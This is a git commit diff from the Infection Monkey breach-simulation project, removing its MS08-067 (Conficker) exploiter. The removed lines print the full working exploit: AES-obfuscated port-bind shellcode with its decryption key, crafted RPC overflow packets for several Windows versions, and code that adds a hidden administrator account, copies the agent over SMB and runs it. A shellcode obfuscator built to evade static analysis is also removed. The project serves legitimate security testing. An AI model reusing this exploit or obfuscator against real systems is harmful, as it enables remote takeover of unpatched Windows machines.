forked from p34709852/monkey
Merge pull request #1687 from guardicore/1677-remove-ms08-067
Remove MS08-067 Exploiter
This commit is contained in:
commit
635496a4be
|
@ -19,7 +19,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
clearer instructions to the user and avoid confusion. #1684
|
clearer instructions to the user and avoid confusion. #1684
|
||||||
|
|
||||||
### Removed
|
### Removed
|
||||||
- The VSFTPD exploiter. #1533
|
- VSFTPD exploiter. #1533
|
||||||
- Manual agent run command for CMD. #1570
|
- Manual agent run command for CMD. #1570
|
||||||
- Sambacry exploiter. #1567
|
- Sambacry exploiter. #1567
|
||||||
- "Kill file" option in the config. #1536
|
- "Kill file" option in the config. #1536
|
||||||
|
@ -40,6 +40,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/).
|
||||||
- "GET /api/monkey_control/check_remote_port/<string:port>" endpoint. #1635
|
- "GET /api/monkey_control/check_remote_port/<string:port>" endpoint. #1635
|
||||||
- Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597
|
- Max victims to find/exploit, TCP scan interval and TCP scan get banner internal options. #1597
|
||||||
- MySQL fingerprinter. #1648
|
- MySQL fingerprinter. #1648
|
||||||
|
- MS08-067 (Conficker) exploiter. #1677
|
||||||
|
|
||||||
### Fixed
|
### Fixed
|
||||||
- A bug in network map page that caused delay of telemetry log loading. #1545
|
- A bug in network map page that caused delay of telemetry log loading. #1545
|
||||||
|
|
|
@ -47,7 +47,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to
|
||||||
* SMB
|
* SMB
|
||||||
* WMI
|
* WMI
|
||||||
* Shellshock
|
* Shellshock
|
||||||
* Conficker
|
|
||||||
* Elastic Search (CVE-2015-1427)
|
* Elastic Search (CVE-2015-1427)
|
||||||
* Weblogic server
|
* Weblogic server
|
||||||
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
* and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters.
|
||||||
|
|
|
@ -1,14 +0,0 @@
|
||||||
---
|
|
||||||
title: "MS08 067"
|
|
||||||
date: 2020-07-14T08:42:54+03:00
|
|
||||||
draft: false
|
|
||||||
tags: ["exploit", "windows"]
|
|
||||||
---
|
|
||||||
|
|
||||||
### Description
|
|
||||||
|
|
||||||
[MS08-067](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067) is a remote code execution vulnerability.
|
|
||||||
|
|
||||||
This exploiter is unsafe. It's therefore **not** enabled by default.
|
|
||||||
|
|
||||||
If an exploit attempt fails, this could also lead to a crash in Svchost.exe. If a crash in Svchost.exe occurs, the server service will be affected. This may cause a system crash due to the use of buffer overflow.
|
|
|
@ -1,30 +0,0 @@
|
||||||
# This code is used to obfuscate shellcode
|
|
||||||
# Usage:
|
|
||||||
# shellcode_obfuscator.py [your normal shellcode].
|
|
||||||
|
|
||||||
import sys
|
|
||||||
|
|
||||||
# PyCrypto is deprecated, but we use pycryptodome, which uses the exact same imports
|
|
||||||
from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413
|
|
||||||
|
|
||||||
# We only encrypt payloads to hide them from static analysis
|
|
||||||
# it's OK to have these keys plaintext
|
|
||||||
KEY = b"1234567890123456"
|
|
||||||
NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f"
|
|
||||||
|
|
||||||
|
|
||||||
# Use this manually to get obfuscated bytes of shellcode
|
|
||||||
def obfuscate(shellcode: bytes) -> bytes:
|
|
||||||
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
|
||||||
ciphertext, _ = cipher.encrypt_and_digest(shellcode)
|
|
||||||
return ciphertext
|
|
||||||
|
|
||||||
|
|
||||||
def clarify(shellcode: bytes) -> bytes:
|
|
||||||
cipher = AES.new(KEY, AES.MODE_EAX, nonce=NONCE)
|
|
||||||
plaintext = cipher.decrypt(shellcode)
|
|
||||||
return plaintext
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print(obfuscate(sys.argv[1].encode()))
|
|
|
@ -23,7 +23,6 @@ ScoutSuite = {git = "git://github.com/guardicode/ScoutSuite"}
|
||||||
pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl
|
pyopenssl = "==19.0.0" # We can't build 32bit ubuntu12 binary with newer versions of pyopenssl
|
||||||
pypsrp = "*"
|
pypsrp = "*"
|
||||||
typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project
|
typing-extensions = "*" # Allows us to use 3.9 typing features on 3.7 project
|
||||||
pycryptodome = "*" # Used in common/utils/shellcode_obfuscator.py
|
|
||||||
altgraph = "*" # Required for pyinstaller branch, without it agents fail to build
|
altgraph = "*" # Required for pyinstaller branch, without it agents fail to build
|
||||||
pysmb = "*"
|
pysmb = "*"
|
||||||
"WinSys-3.x" = "*"
|
"WinSys-3.x" = "*"
|
||||||
|
|
|
@ -146,9 +146,6 @@ class Configuration(object):
|
||||||
|
|
||||||
skip_exploit_if_file_exist = False
|
skip_exploit_if_file_exist = False
|
||||||
|
|
||||||
ms08_067_exploit_attempts = 5
|
|
||||||
user_to_add = "Monkey_IUSER_SUPPORT"
|
|
||||||
|
|
||||||
###########################
|
###########################
|
||||||
# ransomware config
|
# ransomware config
|
||||||
###########################
|
###########################
|
||||||
|
|
|
@ -43,8 +43,6 @@
|
||||||
],
|
],
|
||||||
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
"monkey_log_path_windows": "%temp%\\~df1563.tmp",
|
||||||
"monkey_log_path_linux": "/tmp/user-1563",
|
"monkey_log_path_linux": "/tmp/user-1563",
|
||||||
"ms08_067_exploit_attempts": 5,
|
|
||||||
"user_to_add": "Monkey_IUSER_SUPPORT",
|
|
||||||
"ping_scan_timeout": 10000,
|
"ping_scan_timeout": 10000,
|
||||||
"smb_download_timeout": 300,
|
"smb_download_timeout": 300,
|
||||||
"smb_service_name": "InfectionMonkey",
|
"smb_service_name": "InfectionMonkey",
|
||||||
|
|
|
@ -1,320 +0,0 @@
|
||||||
#!/usr/bin/env python
|
|
||||||
#############################################################################
|
|
||||||
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
|
|
||||||
# www.hackingspirits.com
|
|
||||||
# www.coffeeandsecurity.com
|
|
||||||
# Email: d3basis.m0hanty @ gmail.com
|
|
||||||
#############################################################################
|
|
||||||
|
|
||||||
import socket
|
|
||||||
import time
|
|
||||||
from enum import IntEnum
|
|
||||||
from logging import getLogger
|
|
||||||
|
|
||||||
from impacket import uuid
|
|
||||||
from impacket.dcerpc.v5 import transport
|
|
||||||
|
|
||||||
from common.utils.shellcode_obfuscator import clarify
|
|
||||||
from infection_monkey.exploit.HostExploiter import HostExploiter
|
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
|
|
||||||
from infection_monkey.exploit.tools.smb_tools import SmbTools
|
|
||||||
from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
|
|
||||||
from infection_monkey.network.smbfinger import SMBFinger
|
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
|
||||||
from infection_monkey.utils.commands import build_monkey_commandline
|
|
||||||
from infection_monkey.utils.random_password_generator import get_random_password
|
|
||||||
|
|
||||||
logger = getLogger(__name__)
|
|
||||||
|
|
||||||
# Portbind shellcode from metasploit; Binds port to TCP port 4444
|
|
||||||
OBFUSCATED_SHELLCODE = (
|
|
||||||
b"4\xf6kPF\xc5\x9b<K\xf8Q\t\xff\xc94\xa9('\xa5%4m\xcd\xa0c\xd9"
|
|
||||||
b"\xd4Y\xca\x80*\xa7S\x98\xb3n+k\xe5\xe3\xffR\x85\xf4k\xb2\xd3"
|
|
||||||
b"\xaa\x10*\x0f\xb5\xdc-W(\x9c\xfe\xfa\xb8\x0eT1\xce\x8a\x9b\x0c"
|
|
||||||
b'\xd4"v\x04\xac~\xec\x04\xb07v\x81\xfd\xed\xd6\x11\x82\xbaN\x1f+'
|
|
||||||
b"\xd6\x9a\xda\xb5yyP\xf2\r\x8ev\x87\xed\x1eU\xa8\xcd\xc3\xba\x9c"
|
|
||||||
b"\x02\xf5\x7f\xb1\xed\xfaN(|\xf7\x1aBPw\xdf!\x86\xd2\x8a\xfe\x1b"
|
|
||||||
b"\x01\xc3\x9d\x802\xeeQ\x13\xff\xde\x95\xe0u\xa5\x19\xc8\xdd"
|
|
||||||
b"\xab[\x86\xdf\xf8\x84\xc6{\xe0W\x9b\xb0[\x05bA\xfc\xde\xa8B"
|
|
||||||
b"\x91b\xfey\x152q4\x15\xa7\x91)\xe8\x8b@\xe8\x8bC\xfc\xa6\x7f"
|
|
||||||
b"\xfc%!_\xef\xe8\x13\xc3\xb4NDA\x0e%\xee\xbdK]L\xa2\x83|\xb3"
|
|
||||||
b"\xa2\xd3\x97]\xd8b\x03\xa7\x0c}\x93\x85\x18\x16\xff\xf1\xfe"
|
|
||||||
b"\xff\xe0E\x0b\xb6\xdb\xdc\xe5\xdb\xc5zr\xf1\r3\xd0\xf5\x80"
|
|
||||||
b"\x89\x86V\x97\x1a\xf2f\x95\x89\xd5\xce\x9a\xee\xa1\xcf\x97"
|
|
||||||
b"\x92\xc5Bx{7\x0cv\xa6\x9d\xaaf\xa4\xb4\x1e\x9ex\x1f\x91N\xe7ZY"
|
|
||||||
b"\xa90\xcd\x94\xb7\x800'\r\x19W\x86\x9d~\x87\x9a\x8e\x8c\x90Gq"
|
|
||||||
b"\x84sB\x07\x10\x8etP\xa5\xfe\x89\x1b\xfe\x0f\xa9&\xab\x19\x1fh"
|
|
||||||
b"\x18b\xd2y\xbd\xd1\xefe\x14p\xe5{ZW\x00T\xf8\x89\x8d\r\xd48\xb1V"
|
|
||||||
b"\xd9\xc3%\x89\x9c\x8e\x11\x00\x96\xe3\xd8\x80\\\x07\xc8d\x7f:\xc3T"
|
|
||||||
b"\xb8\xd1s#\xc0\x04\xcdL\xab\x87\xf0ff\xc2\x02\xe8j\x91\x0eF\x9c[\xb79"
|
|
||||||
b"\x13J\xcdf\xbd\x83\x84\xe2\x08\xe5\xcf\xb6\xda\xda\x07\xaa$\xfe($"
|
|
||||||
b"\x86\x0bO\xcb\x8fj\xf6\x15\xb9B\x82\x0c\x7f\xf5!\xad5j\xc7R\x1c"
|
|
||||||
b"\x95\xe7V^O\xdak\xa0q\x81\xf81\xe3lq{\x0f\xdb\ta\xe7>I,\xab\x1d"
|
|
||||||
b"\xa0\x92Y\x88\x1b$\xa0hK\x03\x0b\x0b\xcf\xe7\xff\x9f\x9d\xb6&J"
|
|
||||||
b"\xdf\x1b\xad\x1b5\xaf\x84\xed\x99\x01'\xa8\x03\x90\x01\xec\x13"
|
|
||||||
b"\xfb\xf9!\x11\x1dc\xd9*\xb4\xd8\x9c\xf1\xb8\xb9\xa1;\x93\xc1\x8dq"
|
|
||||||
b"\xe4\xe1\xe5?%\x1a\x96\x96\xb5\x94\x19\xb5o\x0c\xdb\x89Cq\x14M\xf8"
|
|
||||||
b"\x02\xfb\xe5\x88hL\xc4\xcdd\x90\x8bc\xff\xe3\xb8z#\x174\xbd\x00J"
|
|
||||||
b'\x1c\xc1\xccM\x94\x90tm\x89N"\xd4-'
|
|
||||||
)
|
|
||||||
|
|
||||||
SHELLCODE = clarify(OBFUSCATED_SHELLCODE).decode()
|
|
||||||
|
|
||||||
XP_PACKET = (
|
|
||||||
"\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
|
|
||||||
"\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
|
|
||||||
"\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
|
|
||||||
"\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
|
|
||||||
"\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
|
|
||||||
"\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
|
|
||||||
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
|
||||||
"\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
|
|
||||||
"\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
|
|
||||||
"\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
|
|
||||||
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00"
|
|
||||||
)
|
|
||||||
|
|
||||||
# Payload for Windows 2000 target
|
|
||||||
PAYLOAD_2000 = "\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00"
|
|
||||||
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x41\x41"
|
|
||||||
PAYLOAD_2000 += "\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\x43\x43\x43\x43\x43\x43\x43\x43"
|
|
||||||
PAYLOAD_2000 += "\xeb\xcc"
|
|
||||||
PAYLOAD_2000 += "\x00\x00"
|
|
||||||
|
|
||||||
# Payload for Windows 2003[SP2] target
|
|
||||||
PAYLOAD_2003 = "\x41\x00\x5c\x00"
|
|
||||||
PAYLOAD_2003 += "\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
|
|
||||||
PAYLOAD_2003 += "\x2e\x00\x5c\x00\x0a\x32\xbb\x77"
|
|
||||||
PAYLOAD_2003 += "\x8b\xc4\x66\x05\x60\x04\x8b\x00"
|
|
||||||
PAYLOAD_2003 += "\x50\xff\xd6\xff\xe0\x42\x84\xae"
|
|
||||||
PAYLOAD_2003 += "\xbb\x77\xff\xff\xff\xff\x01\x00"
|
|
||||||
PAYLOAD_2003 += "\x01\x00\x01\x00\x01\x00\x43\x43"
|
|
||||||
PAYLOAD_2003 += "\x43\x43\x37\x48\xbb\x77\xf5\xff"
|
|
||||||
PAYLOAD_2003 += "\xff\xff\xd1\x29\xbc\x77\xf4\x75"
|
|
||||||
PAYLOAD_2003 += "\xbd\x77\x44\x44\x44\x44\x9e\xf5"
|
|
||||||
PAYLOAD_2003 += "\xbb\x77\x54\x13\xbf\x77\x37\xc6"
|
|
||||||
PAYLOAD_2003 += "\xba\x77\xf9\x75\xbd\x77\x00\x00"
|
|
||||||
|
|
||||||
|
|
||||||
class WindowsVersion(IntEnum):
|
|
||||||
Windows2000 = 1
|
|
||||||
Windows2003_SP2 = 2
|
|
||||||
WindowsXP = 3
|
|
||||||
|
|
||||||
|
|
||||||
class SRVSVC_Exploit(object):
|
|
||||||
TELNET_PORT = 4444
|
|
||||||
|
|
||||||
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
|
|
||||||
self._port = port
|
|
||||||
self._target = target_addr
|
|
||||||
self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
|
|
||||||
self.os_version = os_version
|
|
||||||
|
|
||||||
def get_telnet_port(self):
|
|
||||||
"""get_telnet_port()
|
|
||||||
|
|
||||||
The port on which the Telnet service will listen.
|
|
||||||
"""
|
|
||||||
|
|
||||||
return SRVSVC_Exploit.TELNET_PORT
|
|
||||||
|
|
||||||
def start(self):
|
|
||||||
"""start() -> socket
|
|
||||||
|
|
||||||
Exploit the target machine and return a socket connected to it's
|
|
||||||
listening Telnet service.
|
|
||||||
"""
|
|
||||||
|
|
||||||
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
|
|
||||||
|
|
||||||
logger.debug("Initiating exploit connection (%s)", target_rpc_name)
|
|
||||||
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
|
|
||||||
self._trans.connect()
|
|
||||||
|
|
||||||
logger.debug("Connected to %s", target_rpc_name)
|
|
||||||
|
|
||||||
self._dce = self._trans.DCERPC_class(self._trans)
|
|
||||||
self._dce.bind(uuid.uuidtup_to_bin(("4b324fc8-1670-01d3-1278-5a47bf6ee188", "3.0")))
|
|
||||||
|
|
||||||
dce_packet = self._build_dce_packet()
|
|
||||||
self._dce.call(0x1F, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
|
|
||||||
|
|
||||||
logger.debug("Exploit sent to %s successfully...", self._target)
|
|
||||||
logger.debug("Target machine should be listening over port %d now", self.get_telnet_port())
|
|
||||||
|
|
||||||
sock = socket.socket()
|
|
||||||
sock.connect((self._target, self.get_telnet_port()))
|
|
||||||
return sock
|
|
||||||
|
|
||||||
def _build_dce_packet(self):
|
|
||||||
if self.os_version == WindowsVersion.WindowsXP:
|
|
||||||
return XP_PACKET
|
|
||||||
# Constructing Malicious Packet
|
|
||||||
dce_packet = "\x01\x00\x00\x00"
|
|
||||||
dce_packet += "\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00"
|
|
||||||
dce_packet += SHELLCODE
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x41\x41\x41\x41\x41\x41\x41\x41"
|
|
||||||
dce_packet += "\x00\x00\x00\x00"
|
|
||||||
dce_packet += "\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00"
|
|
||||||
dce_packet += self._payload
|
|
||||||
dce_packet += "\x00\x00\x00\x00"
|
|
||||||
dce_packet += "\x02\x00\x00\x00\x02\x00\x00\x00"
|
|
||||||
dce_packet += "\x00\x00\x00\x00\x02\x00\x00\x00"
|
|
||||||
dce_packet += "\x5c\x00\x00\x00\x01\x00\x00\x00"
|
|
||||||
dce_packet += "\x01\x00\x00\x00"
|
|
||||||
|
|
||||||
return dce_packet
|
|
||||||
|
|
||||||
|
|
||||||
class Ms08_067_Exploiter(HostExploiter):
|
|
||||||
_TARGET_OS_TYPE = ["windows"]
|
|
||||||
_EXPLOITED_SERVICE = "Microsoft Server Service"
|
|
||||||
_windows_versions = {
|
|
||||||
"Windows Server 2003 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
|
|
||||||
"Windows Server 2003 R2 3790 Service Pack 2": WindowsVersion.Windows2003_SP2,
|
|
||||||
"Windows 5.1": WindowsVersion.WindowsXP,
|
|
||||||
}
|
|
||||||
|
|
||||||
def __init__(self, host):
|
|
||||||
super(Ms08_067_Exploiter, self).__init__(host)
|
|
||||||
|
|
||||||
def is_os_supported(self):
|
|
||||||
if self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get("version") in list(
|
|
||||||
self._windows_versions.keys()
|
|
||||||
):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if not self.host.os.get("type") or (
|
|
||||||
self.host.os.get("type") in self._TARGET_OS_TYPE and not self.host.os.get("version")
|
|
||||||
):
|
|
||||||
is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445)
|
|
||||||
if is_smb_open:
|
|
||||||
smb_finger = SMBFinger()
|
|
||||||
if smb_finger.get_host_fingerprint(self.host):
|
|
||||||
return self.host.os.get("type") in self._TARGET_OS_TYPE and self.host.os.get(
|
|
||||||
"version"
|
|
||||||
) in list(self._windows_versions.keys())
|
|
||||||
return False
|
|
||||||
|
|
||||||
def _exploit_host(self):
|
|
||||||
src_path = get_target_monkey(self.host)
|
|
||||||
|
|
||||||
if not src_path:
|
|
||||||
logger.info("Can't find suitable monkey executable for host %r", self.host)
|
|
||||||
return False
|
|
||||||
|
|
||||||
os_version = self._windows_versions.get(
|
|
||||||
self.host.os.get("version"), WindowsVersion.Windows2003_SP2
|
|
||||||
)
|
|
||||||
|
|
||||||
exploited = False
|
|
||||||
random_password = get_random_password()
|
|
||||||
for _ in range(self._config.ms08_067_exploit_attempts):
|
|
||||||
exploit = SRVSVC_Exploit(target_addr=self.host.ip_addr, os_version=os_version)
|
|
||||||
|
|
||||||
try:
|
|
||||||
sock = exploit.start()
|
|
||||||
|
|
||||||
sock.send(
|
|
||||||
"cmd /c (net user {} {} /add) &&"
|
|
||||||
" (net localgroup administrators {} /add)\r\n".format(
|
|
||||||
self._config.user_to_add,
|
|
||||||
random_password,
|
|
||||||
self._config.user_to_add,
|
|
||||||
).encode()
|
|
||||||
)
|
|
||||||
time.sleep(2)
|
|
||||||
sock.recv(1000)
|
|
||||||
|
|
||||||
logger.debug("Exploited into %r using MS08-067", self.host)
|
|
||||||
exploited = True
|
|
||||||
break
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug("Error exploiting victim %r: (%s)", self.host, exc)
|
|
||||||
continue
|
|
||||||
|
|
||||||
if not exploited:
|
|
||||||
logger.debug("Exploiter MS08-067 is giving up...")
|
|
||||||
return False
|
|
||||||
|
|
||||||
# copy the file remotely using SMB
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
|
||||||
self.host,
|
|
||||||
src_path,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
self._config.user_to_add,
|
|
||||||
random_password,
|
|
||||||
)
|
|
||||||
|
|
||||||
if not remote_full_path:
|
|
||||||
# try other passwords for administrator
|
|
||||||
for password in self._config.exploit_password_list:
|
|
||||||
remote_full_path = SmbTools.copy_file(
|
|
||||||
self.host,
|
|
||||||
src_path,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
"Administrator",
|
|
||||||
password,
|
|
||||||
)
|
|
||||||
if remote_full_path:
|
|
||||||
break
|
|
||||||
|
|
||||||
if not remote_full_path:
|
|
||||||
return True
|
|
||||||
|
|
||||||
# execute the remote dropper in case the path isn't final
|
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
|
||||||
cmdline = DROPPER_CMDLINE_WINDOWS % {
|
|
||||||
"dropper_path": remote_full_path
|
|
||||||
} + build_monkey_commandline(
|
|
||||||
self.host,
|
|
||||||
get_monkey_depth() - 1,
|
|
||||||
self._config.dropper_target_path_win_32,
|
|
||||||
)
|
|
||||||
else:
|
|
||||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
|
||||||
"monkey_path": remote_full_path
|
|
||||||
} + build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
|
||||||
|
|
||||||
try:
|
|
||||||
sock.send(("start %s\r\n" % (cmdline,)).encode())
|
|
||||||
sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
|
|
||||||
except Exception as exc:
|
|
||||||
logger.debug(
|
|
||||||
"Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc
|
|
||||||
)
|
|
||||||
return True
|
|
||||||
finally:
|
|
||||||
try:
|
|
||||||
sock.close()
|
|
||||||
except socket.error:
|
|
||||||
pass
|
|
||||||
|
|
||||||
logger.info(
|
|
||||||
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
|
|
||||||
remote_full_path,
|
|
||||||
self.host,
|
|
||||||
cmdline,
|
|
||||||
)
|
|
||||||
|
|
||||||
return True
|
|
|
@ -42,17 +42,6 @@ EXPLOITER_CLASSES = {
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
"link": "https://www.guardicore.com/infectionmonkey/docs/reference"
|
||||||
"/exploiters/mssql/",
|
"/exploiters/mssql/",
|
||||||
},
|
},
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": ["Ms08_067_Exploiter"],
|
|
||||||
"title": "MS08-067 Exploiter",
|
|
||||||
"safe": False,
|
|
||||||
"info": "Unsafe exploiter, that might cause system crash due to the use of buffer "
|
|
||||||
"overflow. "
|
|
||||||
"Uses MS08-067 vulnerability.",
|
|
||||||
"link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/ms08"
|
|
||||||
"-067/",
|
|
||||||
},
|
|
||||||
{
|
{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"enum": ["SSHExploiter"],
|
"enum": ["SSHExploiter"],
|
||||||
|
|
|
@ -266,24 +266,6 @@ INTERNAL = {
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
"ms08_067": {
|
|
||||||
"title": "MS08_067",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"ms08_067_exploit_attempts": {
|
|
||||||
"title": "MS08_067 exploit attempts",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 5,
|
|
||||||
"description": "Number of attempts to exploit using MS08_067",
|
|
||||||
},
|
|
||||||
"user_to_add": {
|
|
||||||
"title": "Remote user",
|
|
||||||
"type": "string",
|
|
||||||
"default": "Monkey_IUSER_SUPPORT",
|
|
||||||
"description": "Username to add on successful exploit",
|
|
||||||
},
|
|
||||||
},
|
|
||||||
},
|
|
||||||
},
|
},
|
||||||
"smb_service": {
|
"smb_service": {
|
||||||
"title": "SMB service",
|
"title": "SMB service",
|
||||||
|
|
|
@ -34,7 +34,6 @@ class ExploiterDescriptorEnum(Enum):
|
||||||
ELASTIC = ExploiterDescriptor(
|
ELASTIC = ExploiterDescriptor(
|
||||||
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
"ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor
|
||||||
)
|
)
|
||||||
MS08_067 = ExploiterDescriptor("Ms08_067_Exploiter", "Conficker Exploiter", ExploitProcessor)
|
|
||||||
SHELLSHOCK = ExploiterDescriptor(
|
SHELLSHOCK = ExploiterDescriptor(
|
||||||
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
|
"ShellShockExploiter", "ShellShock Exploiter", ShellShockExploitProcessor
|
||||||
)
|
)
|
||||||
|
|
|
@ -30,7 +30,6 @@ import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues
|
||||||
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue';
|
||||||
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
|
import {shellShockIssueOverview, shellShockIssueReport} from './security/issues/ShellShockIssue';
|
||||||
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue';
|
||||||
import {ms08_067IssueOverview, ms08_067IssueReport} from './security/issues/MS08_067Issue';
|
|
||||||
import {
|
import {
|
||||||
crossSegmentIssueOverview,
|
crossSegmentIssueOverview,
|
||||||
crossSegmentIssueReport,
|
crossSegmentIssueReport,
|
||||||
|
@ -136,11 +135,6 @@ class ReportPageComponent extends AuthComponent {
|
||||||
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
[this.issueContentTypes.REPORT]: powershellIssueReport,
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
||||||
},
|
},
|
||||||
'Ms08_067_Exploiter': {
|
|
||||||
[this.issueContentTypes.OVERVIEW]: ms08_067IssueOverview,
|
|
||||||
[this.issueContentTypes.REPORT]: ms08_067IssueReport,
|
|
||||||
[this.issueContentTypes.TYPE]: this.issueTypes.DANGER
|
|
||||||
},
|
|
||||||
'ZerologonExploiter': {
|
'ZerologonExploiter': {
|
||||||
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
|
[this.issueContentTypes.OVERVIEW]: zerologonIssueOverview,
|
||||||
[this.issueContentTypes.REPORT]: zerologonIssueReport,
|
